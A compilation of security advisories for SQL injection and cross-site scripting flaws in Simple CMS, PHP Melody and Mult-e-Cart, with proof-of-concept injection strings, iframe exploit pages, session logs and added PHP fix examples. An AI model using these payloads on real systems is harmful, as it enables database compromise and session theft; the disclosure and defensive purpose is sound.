2021-**-**: Security Acknowledgements (Security Department)
2021-10-19: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Authentication Type:
====================
Restricted Authentication (Moderator Privileges)

User Interaction:
=================
No User Interaction

Disclosure Type:
================
Independent Security Research

Technical Details & Description:
================================
A remote SQL injection vulnerability has been discovered in the Simplephpscripts Simple CMS v2.1 web-application. The
vulnerability allows remote attackers to inject or execute their own SQL commands to compromise the DBMS or the file
system of the application.

The SQL injection vulnerability is located in the `newUser` and `editUser` functions of the `users` module in the
`admin.php` file. Remote attackers with privileged access to the panel are able to add users. If a user account already
exists, for example the admin account, each attempt to add the same name or email value results in an unfiltered MySQL
exception that echoes the failing query to the client. The exception is neither filtered nor sanitized, and the submitted
values are concatenated directly into the query, so a privileged attacker can inject and execute their own SQL commands
on the affected database management system. The request method to inject is POST and the attack vector is
non-persistent. Exploitation of the SQL injection vulnerability requires a privileged web-application user account and
no user interaction.
Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] newUser
[+] editUser

Vulnerable File(s):
[+] admin.php?act=users

Vulnerable Input(s):
[+] Name
[+] Username
[+] Password

Vulnerable Parameter(s):
[+] name
[+] username
[+] password

Affected Module(s):
[+] Users (act=users) (Backend)

Proof of Concept (PoC):
=======================
The remote sql-injection web vulnerability can be exploited by remote attackers with a privileged account and without user interaction.
For security demonstration or to reproduce the sql injection vulnerability follow the provided information and steps below to continue.

PoC: Example
act=addUser&name=[ADD EXISTING DEFAULT VALUE!]&email=test@test.de&username=[ADD EXISTING DEFAULT VALUE!]&password=[ADD EXISTING DEFAULT VALUE!]&submit=Add User

PoC: Exploitation
act=addUser&name=[ADD EXISTING DEFAULT VALUE]-[SQL-INJECTION!]'&email=test@test.de&username=[ADD EXISTING DEFAULT VALUE]-[SQL-INJECTION!]'&password=a-1'&submit=Add User

--- PoC Session Logs (POST) ---
https://simple-cms.localhost:8000/simplecms/admin.php
Host: simple-cms.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://simple-cms.localhost:8000/simplecms/admin.php?act=newUser
Content-Type: application/x-www-form-urlencoded
Content-Length: 132
Origin: https://simple-cms.localhost:8000
Connection: keep-alive
Cookie: PHPSESSID=9smae9mm1m1misttrp1a2e1p23
act=addUser&name=[ADD EXISTING DEFAULT VALUE]-[SQL-INJECTION!]'&email=test@test.de&username=[ADD EXISTING DEFAULT VALUE]-[SQL-INJECTION!]'&password=[ADD EXISTING DEFAULT VALUE]-[SQL-INJECTION!]'&submit=Add User
-
POST: HTTP/2.0 200 OK
server: Apache
content-length: 1224
content-type: text/html; charset=UTF-8

--- SQL Error Exception Logs ---
Error: SELECT * FROM cms2_users WHERE username='a%20-1'
Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%20-1'' at line 1

Solution - Fix & Patch:
=======================
1. Do not display sql errors in the frontend or backend, and never echo the broken or malicious query back to the client.
2. Use prepared statements to protect the sql query of the post method request.
3. Restrict the post parameters by disallowing special chars such as single or double quotes.
4. Set up a filter or validation class to deny broken or manipulated sql queries.

Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains:    www.vulnerability-lab.com    www.vuln-lab.com    www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com    paste.vulnerability-db.com    infosec.vulnerability-db.com
Social:     twitter.com/vuln_lab    facebook.com/VulnerabilityLab    youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php    vulnerability-lab.com/rss/rss_upcoming.php    vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    vulnerability-lab.com/register.php    vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to ask for permission.

Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)
-
PHP Melody 3.0 - 'Multiple' Cross-Site Scripting (XSS)
# Exploit Title: PHP Melody 3.0 - 'Multiple' Cross-Site Scripting (XSS)
# Date: 2021-10-20
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.phpsugar.com/phpmelody.html
# Version: v3
# Tested on: Linux

Document Title:
===============
PHP Melody v3.0 - Multiple Cross Site Web Vulnerabilities

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2290

Bulletin: https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/

Release Date:
=============
2021-10-20

Vulnerability Laboratory ID (VL-ID):
====================================
2290

Common Vulnerability Scoring System:
====================================
5

Vulnerability Class:
====================
Cross Site Scripting - Non Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
Upload, import, stream or embed any media. The smart way to manage audio & video. Comes with all the tools you need for online publishing. Beautiful content for your site. Allow users to create their channels, subscribe and follow the content they like. Podcast, mini-series, TV shows or movies. Everything is easier to publish with our CMS. Invest in a Secure Foundation. Build with a proven CMS.

(Copy of the Homepage: https://www.phpsugar.com/phpmelody.html )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple non-persistent cross site scripting vulnerabilities in the PHP Melody v3.0 video cms web-application.
Affected Product(s):
====================
PHPSUGAR
Product: PHP Melody v3.0 - Video CMS (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-09-04: Vendor Response/Feedback (Security Department)
2021-09-22: Vendor Fix/Patch (Service Developer Team)
2021-09-22: Security Acknowledgements (Security Department)
2021-10-20: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Pre Auth (No Privileges or Session)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
Multiple non-persistent cross site web vulnerabilities have been discovered in the official PHP Melody v3.0 video cms web-application. The vulnerabilities allow remote attackers to inject their own malicious script code with a non-persistent attack vector to compromise browser to web-application requests on the client-side.

The cross site scripting vulnerabilities are located in the `moved`, `username` and `keyword` parameters of the `categories.php`, `import.php` and `import-user.php` files. The injection point is the get method request, and the execution occurs with a non-persistent attack vector in the status message or exception of the admin panel ui.

Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious sources and non-persistent manipulation of affected application modules.
Request Method(s):
[+] GET

Vulnerable File(s):
[+] categories.php
[+] import-user.php
[+] import.php

Vulnerable Parameter(s):
[+] move
[+] username
[+] keyword

Affected Module(s):
[+] Status Message & Exception

Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerabilities can be exploited by remote attackers without an account and with low user interaction.
For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.

PoC: Payload
%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E

PoC: Exploitation
https://phpmelody.localhost.com:8080/admin/categories.php?type=genre&id=1&moved=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E
-
https://phpmelody.localhost.com:8080/admin/import-user.php?action=search&username=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E &results=50&autofilling=0&autodata=1&oc=1&utc=19&data_source=youtube&sub_id=24&page=1
-
https://phpmelody.localhost.com:8080/admin/import.php?action=search&keyword=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&results=50&page=1&autofilling=0&autodata=1&oc=1&utc=7&search_category=Comedy&search_orderby=relevance&data_source=youtube&sub_id=4

PoC: Exploit
<html>
<head><body>
<title>PHP Melody v3.0 - XSS PoC Exploit</title>
#1
<iframe src="https://phpmelody.localhost.com:8080/admin/categories.php?type=genre&id=1&moved=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E" width="200" height="200"> </iframe>
#2
<iframe src="https://phpmelody.localhost.com:8080/admin/import-user.php?action=search&username=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E" width="200" height="200"> &results=50&autofilling=0&autodata=1&oc=1&utc=19&data_source=youtube&sub_id=24&page=1 </iframe>
#3
<iframe src="https://phpmelody.localhost.com:8080/admin/import.php?action=search&keyword=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E" width="200" height="200">&results=50&page=1&autofilling=0&autodata=1&oc=1&utc=7&search_category=Comedy&search_orderby=relevance&data_source=youtube&sub_id=4 </iframe>
</body></head>
</html>

--- PoC Session Logs (GET) (move) ---
https://phpmelody.localhost.com:8080/admin/categories.php?type=genre&id=1&moved="><iframe src=evil.source onload=alert(document.cookie)>
Host: phpmelody.localhost.com:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Cookie: PHPSESSID=acf50832ffd23b7d11815fa2b8f2e17u; melody_d900e07810ba03257e53baf46a9ada6f=admin; melody_key_d900e07810ba03257e53baf46a9ada6f=cc33e6eb60d2c1e31a5612bd8c193c88; cookieconsent_dismissed=yes; sidebar-main-state=maxi; watched_video_list=MSw0LDUsNywy; pm_elastic_player=normal; aa_import_from=youtube; guest_name_d900e07810ba03257e53baf46a9ada6f=admin
-
GET: HTTP/2.0 200 OK
content-type: text/html; charset=utf-8
x-powered-by: PHP/5.4.34

--- PoC Session Logs (GET) (username) ---
https://phpmelody.localhost:8080/admin/import-user.php?action=search&username="><iframe src=evil.source onload=alert(document.cookie)>&results=50&autofilling=0&autodata=1&oc=1&utc=19&data_source=youtube&sub_id=24&page=1
Host: phpmelody.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Cookie: PHPSESSID=acf50832ffd23b7d11815fa2b8f2e17u; melody_d900e07810ba03257e53baf46a9ada6f=admin; melody_key_d900e07810ba03257e53baf46a9ada6f=cc33e6eb60d2c1e31a5612bd8c193c88; cookieconsent_dismissed=yes; sidebar-main-state=maxi; watched_video_list=MSw0LDUsNywy; pm_elastic_player=normal; aa_import_from=youtube; guest_name_d900e07810ba03257e53baf46a9ada6f=admin
-
GET: HTTP/2.0 200 OK
content-type: text/html; charset=utf-8
x-powered-by: PHP/5.4.34

Vulnerable Source: Categories.php (type=genre&id=1&moved)
<div class="alert alert-success alert-styled-left"><button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">×</span></button>
Category<strong>Film & animation</strong> moved "><iframe src="evil.source" onload="alert(document.cookie)"> a level.</div>
<div id="display_result" style="display:none;"></div>

Vulnerable Source: Import Videos from User (action=search&username)
<div class="card">
<div class="card-body">
<h5 class="mb-3">Username</h5>
<div class="d-block">
<form name="import-user-search-form" id="import-user-search-form" action="" method="post" class="">
<div class="input-group mb-3">
<div class="form-group-feedback form-group-feedback-left">
<input name="username" type="text" class="form-control form-control-lg alpha-grey gautocomplete" value=""><iframe src="evil.source" onload="alert(document.cookie)">" placeholder="Enter username or Channel ID" autocomplete="yt-username" />
<div class="form-control-feedback form-control-feedback-lg">
<i class="icon-search4 text-muted"></i>
</div></div>
<div class="input-group-append">
<select name="data_source" class="form-field alpha-grey custom-select custom-select-lg">
<option value="youtube" selected="selected">Youtube User</option>
<option value="youtube-channel" >Youtube Channel</option>
<option value="dailymotion" >Dailymotion User</option>
<option value="vimeo" >Vimeo User</option>
</select></div>
<div class="input-group-append">
<button type="submit" name="submit" class="btn btn-primary btn-lg" id="search-user-btn">Search</button>
</div></div>

Reference(s):
https://phpmelody.localhost.com:8080/admin/
https://phpmelody.localhost.com:8080/admin/import.php
https://phpmelody.localhost.com:8080/admin/categories.php
https://phpmelody.localhost.com:8080/admin/import-user.php

Solution - Fix & Patch:
=======================
The vulnerabilities can be resolved by the following steps ...
1. Encode, escape or filter the vulnerable move, keyword and username parameters in the get method requests
2. Restrict all the transmitted parameters by disallowing the usage of special chars
3. Sanitize the status message and error message output to prevent the execution points
4. Alternatively, set up security headers and a web firewall or filter to prevent further exploitation

Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
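The four fix steps above (encode the reflected `moved`, `username` and `keyword` values, restrict what the parameters may contain, sanitize the status and error message output, add security headers) in working form. This is an added example and not PHP Melody's code: the function names, the allow-list of accepted `moved` values and the Content-Security-Policy are assumptions; the status-message and input markup follow the vulnerable source shown above.

```php
<?php
// Added example (not PHP Melody code): contextual output encoding for the admin
// status message and the search form, plus response headers as defence in depth.
// Function names, the `moved` allow-list and the CSP value are assumptions.
declare(strict_types=1);

/** Encode a value for HTML element content or a double-quoted attribute. */
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/**
 * Status message for categories.php. The move direction is taken from a fixed
 * allow-list (assumed values), so the raw `moved` parameter is never echoed;
 * the category name, which comes from the database, is still encoded.
 */
function renderMovedMessage(string $categoryName, string $moved): string
{
    $allowed = ['up' => 'up', 'down' => 'down'];
    if (!isset($allowed[$moved])) {
        return '<div class="alert alert-danger">Invalid move request.</div>';
    }
    return '<div class="alert alert-success">Category <strong>' . e($categoryName)
        . '</strong> moved ' . $allowed[$moved] . ' a level.</div>';
}

/**
 * Search form for import-user.php. The echoed username is attribute-encoded, so a
 * value containing `"><iframe ...>` stays inside the value="" attribute.
 */
function renderUsernameInput(string $username): string
{
    return '<input name="username" type="text" class="form-control" value="' . e($username) . '"'
        . ' placeholder="Enter username or Channel ID">';
}

/**
 * Fix step 4: a CSP without 'unsafe-inline' blocks inline event handlers such as
 * onload=, so a reflected payload does not execute even if an encoding bug remains.
 */
function sendSecurityHeaders(): void
{
    header("Content-Security-Policy: default-src 'self'; frame-ancestors 'none'");
    header('X-Content-Type-Options: nosniff');
    header('Referrer-Policy: no-referrer');
}

// Demonstration with a constructed payload of the shape shown in the session logs.
sendSecurityHeaders();
$payload = '"><iframe src=evil.source onload=alert(document.cookie)>';
echo renderMovedMessage('Film & animation', $payload), PHP_EOL;
echo renderUsernameInput($payload), PHP_EOL;
```

Run from the command line the two echoed fragments show the `"` and `<`/`>` of the payload turned into `&quot;`, `&lt;` and `&gt;`, and the invalid `moved` value replaced by the generic error; in a web SAPI the headers are sent before any output.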
-
PHP Melody 3.0 - 'vid' SQL Injection
# Exploit Title: PHP Melody 3.0 - 'vid' SQL Injection
# Date: 2021-10-20
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.phpsugar.com/phpmelody.html
# Version: v3

Document Title:
===============
PHP Melody v3.0 - (vid) SQL Injection Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2295

Bulletin: https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/

Release Date:
=============
2021-10-20

Vulnerability Laboratory ID (VL-ID):
====================================
2295

Common Vulnerability Scoring System:
====================================
7

Vulnerability Class:
====================
SQL Injection

Current Estimated Price:
========================
1.000€ - 2.000€

Product & Service Introduction:
===============================
Upload, import, stream or embed any media. The smart way to manage audio & video. Comes with all the tools you need for online publishing. Beautiful content for your site. Allow users to create their channels, subscribe and follow the content they like. Podcast, mini-series, TV shows or movies. Everything is easier to publish with our CMS. Invest in a Secure Foundation. Build with a proven CMS.

(Copy of the Homepage: https://www.phpsugar.com/phpmelody.html )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a remote sql-injection web vulnerability in the PHP Melody v3.0 video cms web-application.
Affected Product(s):
====================
PHPSUGAR
Product: PHP Melody v3.0 - Video CMS (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-09-04: Vendor Response/Feedback (Security Department)
2021-09-22: Vendor Fix/Patch (Service Developer Team)
2021-09-22: Security Acknowledgements (Security Department)
2021-10-20: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Authentication Type:
====================
Full Authentication (Admin/Root Privileges)

User Interaction:
=================
No User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
A remote sql-injection vulnerability has been discovered in the PHP Melody v3.0 video cms web-application. The vulnerability allows remote attackers to inject or execute their own sql commands to compromise the dbms or file system of the web-application.

The remote sql injection vulnerability is located in the `vid` parameter of the `edit-video.php` file. Remote attackers with moderator or admin access privileges are able to execute their own malicious sql commands via an injected get method request. The vid parameter in the acp ui is not sanitized properly, which allows an attacker to inject their own sql commands to compromise the web-application and dbms. Exploitation of the remote sql injection vulnerability requires no user interaction but a privileged moderator or admin account.

Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.
Request Method(s):
[+] GET

Vulnerable Module(s):
[+] Video Edit

Vulnerable File(s):
[+] edit-video.php

Vulnerable Parameter(s):
[+] vid

Proof of Concept (PoC):
=======================
The remote sql-injection web vulnerability can be exploited by authenticated remote attackers without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Original:
https://phpmelody.localhost:8000/admin/edit-video.php?vid=3435b47dd&a=4&page=1&filter=added&fv=desc

PoC: Exploitation #1
https://phpmelody.localhost:8000/admin/edit-video.php?vid=-3435b47dd' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL, CONCAT(0x7171766b71,0x5642646a536b77547366574a4c43577866565270554f56426b6175535a55764259514b6c486e6e69,0x71626a6271), NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

PoC: Exploitation #2
https://phpmelody.localhost:8000/admin/edit-video.php?vid=3435b47dd-' AND (SELECT 1446 FROM (SELECT(SLEEP([SLEEPTIME])))--

PoC: Exploit
<html>
<head><body>
<title>phpmelody vid sql injection poc</title>
<iframe src="https://phpmelody.localhost:8000/admin/edit-video.php?vid=-3435b47dd' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL, CONCAT(0x7171766b71,0x5642646a536b77547366574a4c43577866565270554f56426b6175535a55764259514b6c486e6e69,0x71626a6271), NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--">
<br>
<iframe src="https://phpmelody.localhost:8000/admin/edit-video.php?vid=3435b47dd-' AND (SELECT 1446 FROM (SELECT(SLEEP([SLEEPTIME])))--">
</body></head>
</html>

Reference(s):
https://phpmelody.localhost:8000/
https://phpmelody.localhost:8000/admin/
https://phpmelody.localhost:8000/admin/edit-video.php

Solution - Fix & Patch:
=======================
The vulnerability can be resolved by the following steps ...
1. Use a prepared statement to build the query
2. Restrict the parameter input to disallow special chars
3. Escape and encode the content to prevent execution of malicious payloads
4. Alternatively, it is possible to integrate a web firewall or filter class to block further attacks.

Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
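The Simple CMS advisory (admin.php `newUser`/`editUser`, POST) and the PHP Melody advisory just above (edit-video.php `vid`, GET) prescribe the same three measures: prepared statements, strict input validation and no SQL error output to the client. This added example, which is not code from either product, shows both request shapes handled that way. The `cms2_users` table name comes from the Simple CMS error log; the `videos` table, the assumed `vid` token format, the column names and the DSN are assumptions.

```php
<?php
// Added example (not Simple CMS or PHP Melody code): the fix pattern both SQL
// injection advisories prescribe, for a POST user-creation handler and a GET
// lookup by id. Table/column names other than cms2_users, the vid format and the
// DSN are assumptions.
declare(strict_types=1);

/**
 * Shape described in the Simple CMS advisory, for contrast only: the value is
 * concatenated into the query and the DBMS exception, query included, is echoed.
 */
function addUserVulnerable(PDO $db, string $username): string
{
    $sql = "SELECT * FROM cms2_users WHERE username='$username'";
    try {
        return $db->query($sql)->fetch() ? 'User exists' : 'ok';
    } catch (PDOException $e) {
        return "Error: $sql Error: " . $e->getMessage(); // leaks query text and DBMS error
    }
}

/** Hardened POST handler: allow-list validation, bound parameters, generic error. */
function addUser(PDO $db, string $name, string $email, string $username, string $password): string
{
    if (!preg_match('/^[A-Za-z0-9_.-]{3,32}$/', $username) || strlen($name) > 64) {
        return 'Invalid name or username.';
    }
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return 'Invalid e-mail address.';
    }
    try {
        // Duplicate check with bound parameters: the value never joins the SQL text.
        $check = $db->prepare('SELECT 1 FROM cms2_users WHERE username = :u OR email = :e');
        $check->execute([':u' => $username, ':e' => $email]);
        if ($check->fetchColumn() !== false) {
            return 'A user with that name or e-mail already exists.';
        }
        $insert = $db->prepare(
            'INSERT INTO cms2_users (name, email, username, password) VALUES (:n, :e, :u, :p)'
        );
        $insert->execute([
            ':n' => $name, ':e' => $email, ':u' => $username,
            ':p' => password_hash($password, PASSWORD_DEFAULT),
        ]);
        return 'User added.';
    } catch (PDOException $e) {
        error_log('addUser failed: ' . $e->getMessage()); // server-side log only
        return 'User could not be added.';
    }
}

/**
 * Hardened GET lookup for an identifier such as PHP Melody's `vid`. The id must
 * match the expected token format (assumed: 6-16 lowercase alphanumerics, which the
 * advisory's original value 3435b47dd satisfies) before it is bound; the UNION and
 * SLEEP payloads in the PoC fail this check and never reach the DBMS.
 */
function findVideo(PDO $db, string $vid): ?array
{
    if (!preg_match('/^[a-z0-9]{6,16}$/', $vid)) {
        return null; // caller answers 400 or 404
    }
    $stmt = $db->prepare('SELECT * FROM videos WHERE vid = :vid LIMIT 1');
    $stmt->execute([':vid' => $vid]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Connection: server-side prepares and exceptions, which the functions above catch.
$db = new PDO('mysql:host=localhost;dbname=app;charset=utf8mb4', 'app', 'REPLACE_ME', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);

// Route the two request shapes from the advisories through the hardened functions.
if (($_POST['act'] ?? '') === 'addUser') {
    echo addUser($db, $_POST['name'] ?? '', $_POST['email'] ?? '',
                 $_POST['username'] ?? '', $_POST['password'] ?? '');
} elseif (isset($_GET['vid'])) {
    $video = findVideo($db, (string) $_GET['vid']);
    http_response_code($video === null ? 404 : 200);
}
```

With `PDO::ATTR_EMULATE_PREPARES` disabled the driver sends the statement and the values separately, so quoting rules of the server never apply to the data; the `catch` blocks are what prevents the "SQL Error Exception Logs" shown in the Simple CMS advisory from reaching the browser.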
-
Mult-e-Cart Ultimate 2.4 - 'id' SQL Injection
# Exploit Title: Mult-e-Cart Ultimate 2.4 - 'id' SQL Injection
# Date: 2021-10-22
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://multecart.com/
# Version: 2.4

Document Title:
===============
Mult-e-Cart Ultimate v2.4 - SQL Injection Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2306

Release Date:
=============
2021-10-22

Vulnerability Laboratory ID (VL-ID):
====================================
2306

Common Vulnerability Scoring System:
====================================
7

Vulnerability Class:
====================
SQL Injection

Current Estimated Price:
========================
1.000€ - 2.000€

Product & Service Introduction:
===============================
Digital Multivendor Marketplace Online Store - eShop CMS

(Source: https://ultimate.multecart.com/ & https://www.techraft.in/ )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple sql-injection web vulnerabilities in the Mult-e-Cart Ultimate v2.4 (v2021) web-application.

Affected Product(s):
====================
Techraft
Product: Digital Multivendor Marketplace Online Store v2.4 - eShop CMS (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-10-22: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Authentication Type:
====================
Restricted Authentication (Moderator Privileges)

User Interaction:
=================
No User Interaction

Disclosure Type:
================
Independent Security Research

Technical Details & Description:
================================
Multiple classic sql-injection web vulnerabilities have been discovered in the Mult-e-Cart Ultimate v2.4 (v2021) web-application.
The web vulnerabilities allow remote attackers to inject or execute their own sql commands to compromise the database management system.

The vulnerabilities are located in the `id` parameter of the `view` and `update` functions. The vulnerable modules are `inventory`, `customer`, `vendor` and `order`. Remote attackers with a vendor shop account are able to exploit the vulnerable id parameter to execute malicious sql commands. The request method to inject is get and the attack vector is located on the client-side. The remote vulnerability is a classic order by sql-injection. The issue is exploitable with one of the two vendor roles or higher privileged roles like admin. Exploitation of the remote sql injection vulnerabilities requires no user interaction and a privileged vendor or admin role user account.

Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] inventory/inventory/update
[+] /customer/customer/view
[+] /vendor/vendor/view
[+] /order/sub-order/view-order

Vulnerable Parameter(s):
[+] id

Proof of Concept (PoC):
=======================
The remote sql injection web vulnerabilities can be exploited by remote attackers with privileged backend panel access and without user interaction.
For security demonstration or to reproduce the remote sql-injection web vulnerability follow the provided information and steps below to continue.
PoC: Payloads
1' union select 1,2,3,4,@@version--&edit=t
1' union select 1,2,3,4,@@database--&edit=t

PoC: Exploitation
https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,5--&edit=t
https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,5--&edit=t
https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,5--&edit=t
https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,5
-
https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,5&edit=t
https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,5&edit=t
https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,5&edit=t
https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,5

PoC: Exploit
<html>
<head><body>
<title>Mult-E-Cart Ultimate - SQL Injection PoC</title>
<iframe="https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,@@database--&edit=t" width="400" height="400"><br>
<iframe="https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,@@database--&edit=t" width="400" height="400"><br>
<iframe="https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,@@database--&edit=t" width="400" height="400"><br>
<iframe="https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,@@database--" width="400" height="400"><br>
<br>
<iframe="https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,@@version--&edit=t" width="400" height="400"><br>
<iframe="https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,@@version--&edit=t" width="400" height="400"><br>
<iframe="https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,@@version--&edit=t" width="400" height="400"><br>
<iframe="https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,@@version--" width="400" height="400">
</body></head>
</html>

--- SQL Error Exception Handling Logs ---
SQLSTATE[42S22]: Column not found: 1054 Unknown column '100' in 'order clause'
The SQL being executed was: SELECT * FROM `tbl_inventory` WHERE id=1 order by 100--
-
PDOException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1 in /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php:1299
-
Stack trace:
#0 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1299): PDOStatement->execute()
#1 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1165): yii\db\Command->internalExecute('SELECT * FROM `...')
#2 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(421): yii\db\Command->queryInternal('fetch', NULL)
#3 /home/test/MulteCart/vendor/yiisoft/yii2/db/Query.php(287): yii\db\Command->queryOne()
#4 /home/test/MulteCart/vendor/yiisoft/yii2/db/ActiveQuery.php(304): yii\db\Query->one(NULL)
#5 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(536): yii\db\ActiveQuery->one()
#6 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(300): multeback\modules\inventory\controllers\InventoryController->findModel('-1'')
#7 [internal function]: multeback\modules\inventory\controllers\InventoryController->actionUpdate('-1'')
#8 /home/test/MulteCart/vendor/yiisoft/yii2/base/InlineAction.php(57): call_user_func_array(Array, Array)
#9 /home/test/MulteCart/vendor/yiisoft/yii2/base/Controller.php(181): yii\base\InlineAction->runWithParams(Array)
#10 /home/test/MulteCart/vendor/yiisoft/yii2/base/Module.php(534): yii\base\Controller->runAction('update', Array)
